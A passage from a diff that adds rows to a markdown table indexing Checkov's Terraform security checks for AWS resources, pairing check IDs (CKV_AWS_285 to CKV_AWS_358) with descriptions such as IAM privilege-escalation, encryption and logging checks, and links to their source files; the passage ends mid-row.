+| 396 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) |
+| 397 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 398 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 399 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 400 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 401 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
+| 402 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | 
[IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
+| 403 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
+| 404 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
+| 405 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
+| 406 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
+| 407 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
+| 408 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
+| 409 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
+| 410 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
+| 411 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
+| 412 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
+| 413 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
+| 414 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
+| 415 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
+| 416 | CKV_AWS_289 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
+| 417 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
+| 418 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
+| 419 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
+| 420 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
+| 421 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
+| 422 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) |
+| 423 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster 
is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) |
+| 424 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) |
+| 425 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) |
+| 426 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) |
+| 427 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) |
+| 428 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) |
+| 429 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) |
+| 430 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle 
configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) |
+| 431 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) |
+| 432 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) |
+| 433 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) |
+| 434 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) |
+| 435 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) |
+| 436 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) |
+| 437 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure 
SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) |
+| 438 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) |
+| 439 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) |
+| 440 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) |
+| 441 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) |
+| 442 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) |
+| 443 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | 
[RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) |
+| 444 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) |
+| 445 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) |
+| 446 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) |
+| 447 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
+| 448 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
+| 449 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
+| 450 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three 
dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
+| 451 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) |
+| 452 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) |
+| 453 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) |
+| 454 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) |
+| 455 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) |
+| 456 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) |
+| 457 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging 
is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) |
+| 458 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) |
+| 459 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) |
+| 460 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
+| 461 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
+| 462 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
+| 463 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) |
+| 464 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | 
[EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) |
+| 465 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) |
+| 466 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) |
+| 467 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) |
+| 468 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) |
+| 469 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) |
+| 470 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) |
+| 471 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | 
[SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) |
+| 472 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) |
+| 473 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) |
+| 474 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) |
+| 475 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
+| 476 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
+| 477 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 478 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | 
[WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 479 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 480 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 481 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 482 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
+| 483 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) |
+| 484 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) |
+| 485 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | 
+| 486 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) |
+| 487 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) |
+| 488 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) |
+| 489 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) |
+| 490 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) |
+| 491 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) |
+| 492 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | 
[EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) |
+| 493 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) |
+| 494 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
+| 495 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) |
+| 496 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
+| 497 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) |
+| 498 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 499 | CKV_AWS_355 | resource | 
aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 500 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 501 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 502 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) |
+| 503 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) |
+| 504 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) |
+| 505 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions 
